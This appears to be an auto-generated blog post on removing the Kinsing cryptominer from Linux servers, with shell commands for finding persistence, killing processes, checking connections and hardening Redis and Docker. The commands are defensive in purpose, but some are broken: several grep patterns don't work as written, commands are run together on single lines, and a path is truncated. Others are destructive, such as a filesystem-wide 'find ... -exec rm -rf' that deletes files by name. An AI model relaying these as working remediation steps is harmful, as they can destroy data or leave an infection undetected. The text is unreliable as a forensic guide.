Listen to this Post
The so-called “solution” for a Kinsing infection is not creating a cron job that purges suspicious files but conducting a thorough root-cause analysis to identify persistence mechanisms and clean up properly. A proper forensic analysis after a breach is essential—otherwise, malicious code may reappear, and temporary fixes won’t resolve the issue.
[1] Kinsing Infection Analysis
You Should Know: Kinsing Malware Removal & Forensic Steps
1. Identify Persistence Mechanisms
Kinsing malware often uses multiple persistence techniques, such as:
– Cron Jobs: Check for malicious scheduled tasks.
crontab -l List current user's cron jobs ls -la /etc/cron. System-wide cron directories
– Hidden Processes: Look for unusual processes.
ps aux | grep -i kinsing top -b -n 1 | grep -i "miner|crypto"
– SSH Backdoors: Verify authorized keys.
cat ~/.ssh/authorized_keys ls -la /root/.ssh/
2. Remove Malicious Files & Binaries
Locate and delete Kinsing-related files:
find / -name "kinsing" -exec rm -rf {} \; 2>/dev/null
find / -name "libsystem.so" -delete
3. Kill Malicious Processes
Terminate active Kinsing processes:
pkill -f kinsing pkill -f kdevtmpfsi
4. Check Network Connections
Identify suspicious outbound connections:
netstat -tulnp | grep -E "(kinsing|miner)" ss -tulnp | grep ESTAB
5. Patch Exploited Services
Kinsing often exploits vulnerabilities in:
- Docker (misconfigured APIs)
- Redis (unauthenticated access)
- Web applications (RCE flaws)
Secure them:
Redis echo "requirepass YourStrongPassword" >> /etc/redis/redis.conf systemctl restart redis Docker docker ps -a | grep suspicious_container && docker rm -f suspicious_container
6. Monitor & Harden the System
- Install & Configure Fail2Ban:
apt install fail2ban -y systemctl enable --now fail2ban
- Check Kernel Modules for Rootkits:
lsmod | grep -i "backdoor|malicious"
What Undercode Say
Kinsing is a persistent threat that requires more than superficial cleanup. A proper forensic approach involves:
– Log Analysis: Check /var/log/auth.log, /var/log/syslog.
– File Integrity Monitoring: Use `aide` or tripwire.
– User Account Audits:
awk -F: '($3 == 0) {print}' /etc/passwd Check root-equivalent users
– Memory Forensics: Use `Volatility` if needed.
– Network Isolation: Block malicious IPs via iptables:
iptables -A INPUT -s 1.2.3.4 -j DROP
Always assume persistence—verify, remediate, and monitor continuously.
Expected Output:
A fully remediated system with no traces of Kinsing, secured against reinfection.
References:
Reported By: Stephan Berger – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
